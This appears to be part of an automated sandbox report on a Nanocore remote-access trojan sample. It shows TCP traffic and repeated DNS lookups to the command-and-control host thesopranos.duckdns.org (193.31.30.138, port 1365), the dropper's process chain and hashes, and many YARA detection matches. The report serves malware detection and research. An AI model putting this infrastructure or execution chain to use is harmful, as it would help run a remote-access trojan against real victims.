                  Feb 3, 2023 23:18:32.860162020 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:32.860275984 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.891136885 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:32.937860966 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:32.983515978 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:33.077294111 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:33.469715118 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:33.561687946 CET136549721193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:34.496645927 CET497211365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.024995089 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.056226969 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.056509972 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.118196011 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.153686047 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.165009975 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.196646929 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.237430096 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.327267885 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.390743971 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.391580105 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.422461987 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.434937000 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.465946913 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.466036081 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:40.497078896 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:40.610328913 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:41.032521009 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:41.125655890 CET136549722193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:42.033229113 CET497221365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.176796913 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.210030079 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.210223913 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.210788012 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.246843100 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.247180939 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.277987957 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.287868977 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.374263048 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.438010931 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.459448099 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.490190029 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.490964890 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.521601915 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.521723032 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.552974939 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:46.553155899 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:46.639647961 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:47.034655094 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:47.109220028 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:47.141768932 CET136549723193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:47.189034939 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:48.049072027 CET497231365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.194098949 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.224817038 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.225013018 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.225487947 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.260322094 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.260665894 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.291546106 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.301373005 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.389770031 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.453982115 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.456042051 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.486576080 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.487637043 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.518645048 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.518812895 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:52.549743891 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:52.595899105 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:53.018270969 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:53.108679056 CET136549724193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:54.037337065 CET497241365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:58.786046028 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:58.816811085 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:58.817141056 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:58.842423916 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:58.878007889 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:58.914916039 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:58.945852995 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:58.945928097 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.030313969 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.030447960 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.108513117 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.188306093 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.189759970 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.220313072 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.221293926 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.252062082 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.252227068 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.282958031 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.283129930 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.358501911 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:18:59.896529913 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:18:59.983480930 CET136549725193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:00.927190065 CET497251365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.090713978 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.121771097 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.121951103 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.122395992 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.158226967 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.189728975 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.280673981 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.280824900 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.311976910 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.407607079 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.499319077 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.563019037 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.564213037 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.595349073 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.596491098 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.627516031 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.627624989 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.658555031 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:05.658659935 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:05.749423027 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:06.285273075 CET497261365192.168.2.4193.31.30.138
                  Feb 3, 2023 23:19:06.358781099 CET136549726193.31.30.138192.168.2.4
                  Feb 3, 2023 23:19:07.147891998 CET497261365192.168.2.4193.31.30.138

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 3, 2023 23:17:12.182507992 CET5741753192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:12.291882038 CET53574178.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:23.454297066 CET5098253192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:23.471971989 CET53509828.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:30.550218105 CET6416753192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:30.658106089 CET53641678.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:37.685573101 CET5680753192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:37.703191042 CET53568078.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:45.607497931 CET6100753192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:45.716548920 CET53610078.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:51.722161055 CET6068653192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:51.830809116 CET53606868.8.8.8192.168.2.4
                  Feb 3, 2023 23:17:59.174943924 CET6112453192.168.2.48.8.8.8
                  Feb 3, 2023 23:17:59.283678055 CET53611248.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:06.551378012 CET5944453192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:06.569550037 CET53594448.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:12.558892965 CET5557053192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:12.576698065 CET53555708.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:18.683300018 CET6490653192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:18.792500019 CET53649068.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:26.458391905 CET5086153192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:26.478123903 CET53508618.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:32.484534025 CET6108853192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:32.502001047 CET53610888.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:39.776468992 CET5872953192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:39.884972095 CET53587298.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:46.066214085 CET6470053192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:46.175755024 CET53647008.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:52.083476067 CET5602253192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:52.192724943 CET53560228.8.8.8192.168.2.4
                  Feb 3, 2023 23:18:58.731571913 CET6082253192.168.2.48.8.8.8
                  Feb 3, 2023 23:18:58.748497009 CET53608228.8.8.8192.168.2.4
                  Feb 3, 2023 23:19:04.980493069 CET4975053192.168.2.48.8.8.8
                  Feb 3, 2023 23:19:05.089649916 CET53497508.8.8.8192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Feb 3, 2023 23:17:12.182507992 CET192.168.2.48.8.8.80x82ccStandard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:23.454297066 CET192.168.2.48.8.8.80xe8d3Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:30.550218105 CET192.168.2.48.8.8.80x3e21Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:37.685573101 CET192.168.2.48.8.8.80x16d7Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:45.607497931 CET192.168.2.48.8.8.80x2ba3Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:51.722161055 CET192.168.2.48.8.8.80xec96Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:59.174943924 CET192.168.2.48.8.8.80xc842Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:06.551378012 CET192.168.2.48.8.8.80x8297Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:12.558892965 CET192.168.2.48.8.8.80xcf26Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:18.683300018 CET192.168.2.48.8.8.80x61ecStandard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:26.458391905 CET192.168.2.48.8.8.80x78b2Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:32.484534025 CET192.168.2.48.8.8.80xb12bStandard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:39.776468992 CET192.168.2.48.8.8.80x4a72Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:46.066214085 CET192.168.2.48.8.8.80xc722Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:52.083476067 CET192.168.2.48.8.8.80xfba4Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:58.731571913 CET192.168.2.48.8.8.80x5fcbStandard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false
                  Feb 3, 2023 23:19:04.980493069 CET192.168.2.48.8.8.80xc980Standard query (0)thesopranos.duckdns.orgA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Feb 3, 2023 23:17:12.291882038 CET8.8.8.8192.168.2.40x82ccNo error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:23.471971989 CET8.8.8.8192.168.2.40xe8d3No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:30.658106089 CET8.8.8.8192.168.2.40x3e21No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:37.703191042 CET8.8.8.8192.168.2.40x16d7No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:45.716548920 CET8.8.8.8192.168.2.40x2ba3No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:51.830809116 CET8.8.8.8192.168.2.40xec96No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:17:59.283678055 CET8.8.8.8192.168.2.40xc842No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:06.569550037 CET8.8.8.8192.168.2.40x8297No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:12.576698065 CET8.8.8.8192.168.2.40xcf26No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:18.792500019 CET8.8.8.8192.168.2.40x61ecNo error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:26.478123903 CET8.8.8.8192.168.2.40x78b2No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:32.502001047 CET8.8.8.8192.168.2.40xb12bNo error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:39.884972095 CET8.8.8.8192.168.2.40x4a72No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:46.175755024 CET8.8.8.8192.168.2.40xc722No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:52.192724943 CET8.8.8.8192.168.2.40xfba4No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:18:58.748497009 CET8.8.8.8192.168.2.40x5fcbNo error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false
                  Feb 3, 2023 23:19:05.089649916 CET8.8.8.8192.168.2.40xc980No error (0)thesopranos.duckdns.org193.31.30.138A (IP address)IN (0x0001)false

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:23:17:04
                  Start date:03/02/2023
                  Path:C:\Users\user\Desktop\PhviZrlpkW.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\PhviZrlpkW.exe
                  Imagebase:0x400000
                  File size:775369 bytes
                  MD5 hash:565044691FEDB39980CB814DC26F9EBD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Target ID:1
                  Start time:23:17:04
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo
                  Imagebase:0x280000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 65%, ReversingLabs
                  • Detection: 52%, Virustotal, Browse
                  Reputation:low

                  General

                  Target ID:2
                  Start time:23:17:06
                  Start date:03/02/2023
                  Path:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe
                  Imagebase:0x280000
                  File size:82432 bytes
                  MD5 hash:64F982758878F6A97ED4B3D99CFBD371
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.567185811.00000000043A5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                  • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
